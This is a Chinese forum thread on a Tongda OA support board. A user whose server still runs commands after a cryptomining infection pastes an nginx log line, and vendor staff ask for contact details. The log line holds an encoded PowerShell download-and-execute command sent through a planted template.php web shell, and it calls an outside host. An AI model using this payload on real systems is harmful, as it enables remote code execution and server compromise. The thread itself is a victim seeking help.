首页 › 通达OA产品交流 › 挖矿病毒通过php发起cmd

ZZJBL 发表于 2020-6-22 09:32:26

挖矿病毒通过php发起cmd

本帖最后由 ZZJBL 于 2020-6-22 10:22 编辑

前阵子发现中了挖矿病毒，于是发现有关于勒索病毒的补丁，就把OA更新到最新版OA11.最近没有发现问题，突然今天发现了火绒的一个日志。发现还是可以发起命令。请看下是哪里的问题。
nginx日志：148.70.186.102 - - "GET /general/portal/template.php?cmd=powershell%20-enc%20SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbgBhAG8AcwBiAGkAbwAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwBtAGEAaQBuAC8AagBzAC8AYQB4AC4AdAB4AHQAJwApAA== HTTP/1.1" 200 72 "-" "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-514.26.2.el7.x86_64" "-"

通达赵倩 发表于 2020-6-22 18:57:57

您好，麻烦您留一下联系方式，具体分析下您的问题。

ZZJBL 发表于 2020-6-24 10:50:59

通达赵倩 发表于 2020-6-22 18:57
您好，麻烦您留一下联系方式，具体分析下您的问题。

QQ839481878

通达赵倩 发表于 2020-6-24 18:50:22

ZZJBL 发表于 2020-6-24 10:50
QQ839481878

您好，已添加您。

xieli 发表于 2020-6-28 13:31:07

遇到了同样问题，能否说一下怎么解决的方法吗？

通达赵倩 发表于 2020-6-28 18:00:30

xieli 发表于 2020-6-28 13:31
遇到了同样问题，能否说一下怎么解决的方法吗？

您好，请问下您现在OA是哪个版本的？是否是最新V11.6版本？

xieli 发表于 2020-6-29 13:27:11

通达赵倩 发表于 2020-6-28 18:00
您好，请问下您现在OA是哪个版本的？是否是最新V11.6版本？

是的。不过，我们公司是才升级到v11.6的，而且应该是2017版本时中的。。。

通达赵倩 发表于 2020-6-29 17:25:52

xieli 发表于 2020-6-29 13:27
是的。不过，我们公司是才升级到v11.6的，而且应该是2017版本时中的。。。 ...

您好，请您留一下联系方式，具体分析下您的问题。

xieli 发表于 2020-6-30 13:37:07

通达赵倩 发表于 2020-6-29 17:25
您好，请您留一下联系方式，具体分析下您的问题。

QQ：2831038    谢谢。

通达赵倩 发表于 2020-6-30 17:37:46

xieli 发表于 2020-6-30 13:37
QQ：2831038    谢谢。

您好，已在QQ给您留言。

查看完整版本: 挖矿病毒通过php发起cmd